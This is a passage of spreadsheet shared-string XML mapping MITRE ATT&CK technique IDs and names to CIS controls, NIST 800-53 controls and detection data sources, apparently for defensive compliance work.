    <t>AC-16,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,RA-5,SI-4</t>
  </si>
  <si>
    <t>User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.2,4.5,4.8,13.4,18.3,18.5,13.10</t>
  </si>
  <si>
    <t>AC-16,AC-20,AC-3,AC-4,CA-7,CM-6,CM-7,IA-3,IA-4,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1003.007</t>
  </si>
  <si>
    <t>Proc Filesystem</t>
  </si>
  <si>
    <t>3.3,4.7,5.2,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>T1098.004</t>
  </si>
  <si>
    <t>SSH Authorized Keys</t>
  </si>
  <si>
    <t>2.3,2.5,3.3,4.1,4.8,5.4,6.1,6.2,6.8,7.6,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-3,CM-2,CM-6,CM-7,CM-8,RA-5,SC-12,SI-3,SI-4</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-46,SC-7,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1552.006</t>
  </si>
  <si>
    <t>Group Policy Preferences</t>
  </si>
  <si>
    <t>3.1,3.2,4.1,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-5,AC-6,CA-8,CM-2,CM-6,IA-2,IA-5,RA-5,SA-11,SA-15,SI-2,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1036.003</t>
  </si>
  <si>
    <t>Rename System Utilities</t>
  </si>
  <si>
    <t>3.3,4.1,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-6,CA-7,CM-2,CM-6,SI-3,SI-4</t>
  </si>
  <si>
    <t>File: File Metadata, Image: Image Metadata, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1550.003</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,IA-2,IA-5,SI-4</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>Disable Windows Event Logging</t>
  </si>
  <si>
    <t>T1547.004</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>2.5,2.6,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-5,CM-7,IA-2,SI-10,SI-14,SI-16,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1218.003</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>6.3,6.5,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-19,AC-20,AC-3,AC-4,CM-2,CM-6,IA-2,IA-5,SC-7,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>/etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>T1110.004</t>
  </si>
  <si>
    <t>Credential Stuffing</t>
  </si>
  <si>
    <t>T1574.005</t>
  </si>
  <si>
    <t>Executable Installer File Permissions Weakness</t>
  </si>
  <si>
    <t>Instance: Instance Modification, Instance: Instance Start, Instance: Instance Stop</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1218.009</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>4.2,4.4,4.7,5.2,7.6,7.7,13.4,18.2,18.3</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-44,SC-7,SI-2,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1559.002</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>AC-4,AC-6,CM-10,CM-2,CM-6,CM-7,CM-8,RA-5,SC-18,SC-3,SC-7,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</t>
  </si>
  <si>
    <t>2.3,2.5,9.3</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-20,AC-23,AC-3,AC-4,AC-6,CA-3,CA-7,SA-8,SA-9,SC-28,SC-31,SC-7,SI-3,SI-4,SR-4</t>
  </si>
  <si>
    <t>T1055.008</t>
  </si>
  <si>
    <t>Ptrace System Calls</t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1556.003</t>
  </si>
  <si>
    <t>Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.4,6.5,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CM-5,CM-6,IA-2,IA-5,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1222.002</t>
  </si>
  <si>
    <t>Linux and Mac File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-2,CM-6,RA-5,SI-4</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Creation, Cloud Storage: Cloud Storage Modification, Snapshot: Snapshot Creation, Snapshot: Snapshot Modification</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>2.3,9.3,14.1,14.2,14.6</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,IA-9,SC-20,SC-44,SC-7,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Named Pipe: Named Pipe Metadata, Network Share: Network Share Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>Exchange Email Delegate Permissions</t>
  </si>
  <si>
    <t>3.3,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5</t>
  </si>
  <si>
    <t>File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1059.002</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>2.5,2.7,4.1</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-2,CM-6,IA-9,SI-10,SI-16,SI-3,SI-4,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>T1578.003</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure</t>
  </si>
  <si>
    <t>Delete Cloud Instance</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-5,IA-2,IA-4,IA-6,RA-5,SI-4</t>
  </si>
  <si>
    <t>Domain Name: Active DNS, Domain Name: Passive DNS</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>3.10,4.2,4.6</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-4,CA-3,CM-2,CM-6,CM-8,SC-4,SC-7,SC-8,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1578</t>
  </si>
  <si>
    <t>T1546.008</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>2.5,4.1,4.2,12.2,12.7,13.5,18.3,18.5,13.10</t>
  </si>
  <si>
    <t>CM-10,CM-6,CM-7,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1560.001</t>
  </si>
  <si>
    <t>Archive via Utility</t>
  </si>
  <si>
    <t>Firewall: Firewall Disable, Firewall: Firewall Rule Modification</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>4.7,5.2,6.3,6.4,6.5</t>
  </si>
  <si>
    <t>Application Log: Application Log Content</t>
  </si>
  <si>
    <t>T1546.006</t>
  </si>
  <si>
    <t>LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,18.3,18.5</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,IA-9,SI-10,SI-2,SI-3,SI-4,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>T1547.007</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>2.3,4.1,4.8,7.7,14.3,14.4,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-3,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,RA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1578.001</t>
  </si>
  <si>
    <t>Create Snapshot</t>
  </si>
  <si>
    <t>T1578.002</t>
  </si>
  <si>
    <t>Create Cloud Instance</t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>Add Office 365 Global Administrator Role</t>
  </si>
  <si>
    <t>3.3,4.7,5.3,5.4,6.1,6.2,6.3,6.5</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</t>
  </si>
  <si>
    <t>4.1,6.3,14.1,14.2,14.3,14.6,18.3,18.5</t>
  </si>
  <si>
    <t>AC-20,AC-3,AC-6,CA-7,CM-2,CM-6,IA-2,IA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, WMI: WMI Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1574.001</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,16.13,18.3,18.5</t>
  </si>
  <si>
    <t>CA-8,CM-2,CM-6,CM-7,RA-5,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Creation</t>
  </si>
  <si>
    <t>T1546.013</t>
  </si>
  <si>
    <t>PowerShell Profile</t>
  </si>
  <si>
    <t>2.7,4.1,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-6,CA-7,CM-10,CM-2,CM-6,IA-9,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1218.004</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>T1078.001</t>
  </si>
  <si>
    <t>Default Accounts</t>
  </si>
  <si>
    <t>4.7,5.2</t>
  </si>
  <si>
    <t>AC-2,AC-5,AC-6,CA-7,SA-10,SA-11,SA-15,SA-16,SA-17,SA-3,SA-4,SA-8,SC-28,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>Odbcconf</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1562.007</t>
  </si>
  <si>
    <t>Disable or Modify Cloud Firewall</t>
  </si>
  <si>
    <t>3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,IA-2</t>
  </si>
  <si>
    <t>File: File Modification, Firmware: Firmware Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>3.3,4.1,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-6,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1218.002</t>
  </si>
  <si>
    <t>Control Panel</t>
  </si>
  <si>
    <t>2.5,2.7,4.1,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-3,CA-7,CM-11,CM-2,CM-6,CM-7,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>6.3,6.4,6.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-19,AC-20,AC-3,AC-4,CM-2,CM-6,IA-2,IA-5,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1574.012</t>
  </si>
  <si>
    <t>COR_PROFILER</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,CM-7,IA-2,SI-10,SI-7</t>
  </si>
  <si>
    <t>T1218.001</t>
  </si>
  <si>
    <t>Compiled HTML File</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,9.3,9.6</t>
  </si>
  <si>
    <t>CM-11,CM-2,CM-6,CM-7,SC-18,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>Msiexec</t>
  </si>
  <si>
    <t>2.7,4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-2,CM-5,CM-6,CM-7,IA-2</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>Golden Ticket</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-2,CM-5,CM-6,IA-2,IA-5</t>
  </si>
  <si>
    <t>T1071.002</t>
  </si>
  <si>
    <t>File Transfer Protocols</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>4.7,5.2,5.3,5.4,6.1,6.2</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1137.001</t>
  </si>
  <si>
    <t>Office Template Macros</t>
  </si>
  <si>
    <t>2.3,2.7,4.1,4.8,9.4,18.3,18.5</t>
  </si>
  <si>
    <t>AC-6,CM-2,CM-6,CM-8,RA-5,SC-18,SC-44,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>File: File Access, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1071.003</t>
  </si>
  <si>
    <t>Mail Protocols</t>
  </si>
  <si>
    <t>T1574.004</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t>4.1,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-6,CM-8,RA-5,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Instance: Instance Deletion</t>
  </si>
  <si>
    <t>T1053.006</t>
  </si>
  <si>
    <t>Systemd Timers</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-5,IA-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>AC-17,AC-3,AC-4,AC-6,CA-7,CM-2,CM-5,CM-6,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1553.003</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>2.6,3.3,4.1,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-3,AC-6,CA-7,CM-2,CM-6,CM-7,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Modification, Logon Session: Logon Session Creation, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1059.004</t>
  </si>
  <si>
    <t>Unix Shell</t>
  </si>
  <si>
    <t>Driver: Driver Load</t>
  </si>
  <si>
    <t>T1543.001</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>T1546.002</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.8,18.3,18.5</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,RA-5,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1559.001</t>
  </si>
  <si>
    <t>Component Object Model</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CM-2,CM-5,CM-6,IA-2,SC-18,SC-3,SC-7,SI-3</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1606</t>
  </si>
  <si>
    <t>Forge Web Credentials</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,MA-5,SC-17,SI-2</t>
  </si>
  <si>
    <t>Image: Image Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1055.009</t>
  </si>
  <si>
    <t>Proc Memory</t>
  </si>
  <si>
    <t>3.3,4.1,6.1,6.2,6.8,13.2,13.7</t>
  </si>
  <si>
    <t>AC-3,AC-6,CA-7,SC-18,SC-7,SI-16,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1564.004</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>AC-16,AC-3,CA-7,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1562.008</t>
  </si>
  <si>
    <t>Disable Cloud Logs</t>
  </si>
  <si>
    <t>3.3,4.7,5.3,5.4,6.1,6.2,6.8,8.1,8.2,8.3</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1087.004</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,IA-2,IA-8</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Create Process with Token</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1134.001</t>
  </si>
  <si>
    <t>Token Impersonation/Theft</t>
  </si>
  <si>
    <t>User Account: User Account Creation</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>3.12,4.1,4.4,12.2,12.8,15.7</t>
  </si>
  <si>
    <t>AC-3,AC-4,AC-6,AC-8,CM-6,CM-7,SC-46,SC-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1546.004</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</t>
  </si>
  <si>
    <t>AC-3,AC-6,CA-7,CM-2,CM-6,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Driver: Driver Load, File: File Creation, File: File Modification, Kernel: Kernel Module Load, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1134.005</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>AC-20,AC-3,AC-4,AC-5,AC-6,CM-2,CM-6,SA-11,SA-17,SA-4,SA-8,SC-3</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>Email Forwarding Rule</t>
  </si>
  <si>
    <t>18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-19,AC-20,AC-4,CM-6,SC-43,SC-7,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-5,IA-2,SI-4</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Application Log: Application Log Content, Logon Session: Logon Session Creation, User Account: User Account Authentication, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>T1561.001</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>T1561.002</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>T1547.012</t>
  </si>
  <si>
    <t>Print Processors</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.8</t>
  </si>
  <si>
    <t>T1127.001</t>
  </si>
  <si>
    <t>MSBuild</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-8,RA-5,SI-4</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-23,AC-3,AC-6,CM-12,CP-9,MP-7,SA-8,SC-13,SC-28,SC-38,SC-41,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.8,10.3,18.3,18.5</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,MP-7,RA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1491.002</t>
  </si>
  <si>
    <t>External Defacement</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1564.006</t>
  </si>
  <si>
    <t>Run Virtual Instance</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.8,7.7,18.3,18.5</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1137.003</t>
  </si>
  <si>
    <t>Outlook Forms</t>
  </si>
  <si>
    <t>7.1,7.2,7.3,7.4,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-6,CM-2,CM-6,SC-18,SC-44,SI-2,SI-8</t>
  </si>
  <si>
    <t>T1565.002</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>11.3,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,CM-2,CM-6,CM-8,SC-4,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>Compromise Client Software Binary</t>
  </si>
  <si>
    <t>2.7,4.1</t>
  </si>
  <si>
    <t>CA-8,CM-2,CM-6,IA-9,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>T1055.001</t>
  </si>
  <si>
    <t>Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>4.1,13.2,13.7</t>
  </si>
  <si>
    <t>AC-6,SC-18,SC-7,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>Logon Script (Mac)</t>
  </si>
  <si>
    <t>AC-3,CA-7,CM-2,CM-6,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1134.003</t>
  </si>
  <si>
    <t>Make and Impersonate Token</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>Outlook Home Page</t>
  </si>
  <si>
    <t>T1546.010</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>2.6,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>CM-2,CM-7,SI-10,SI-2,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Kernel: Kernel Module Load</t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>AC-18,CM-2,CM-6,CM-7,CM-8,RA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1037.004</t>
  </si>
  <si>
    <t>Rc.common</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Share: Network Share Access</t>
  </si>
  <si>
    <t>T1037.003</t>
  </si>
  <si>
    <t>Network Logon Script</t>
  </si>
  <si>
    <t>T1102.001</t>
  </si>
  <si>
    <t>Dead Drop Resolver</t>
  </si>
  <si>
    <t>T1102.002</t>
  </si>
  <si>
    <t>Bidirectional Communication</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1553.004</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>CM-10,CM-6,CM-7,IA-9,SC-20,SI-4</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1566.003</t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>2.3,2.5,9.3,14.1,14.2,14.6</t>
  </si>
  <si>
    <t>AC-4,CA-7,SC-44,SC-7,SI-2,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>T1053.004</t>
  </si>
  <si>
    <t>Launchd</t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Modification</t>
  </si>
  <si>
    <t>T1056.003</t>
  </si>
  <si>
    <t>Web Portal Capture</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,12.2</t>
  </si>
  <si>
    <t>T1137.005</t>
  </si>
  <si>
    <t>Outlook Rules</t>
  </si>
  <si>
    <t>T1598.002</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>14.1,14.2,14.6</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>T1547.001</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>Domain Groups</t>
  </si>
  <si>
    <t>File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>T1137.002</t>
  </si>
  <si>
    <t>Office Test</t>
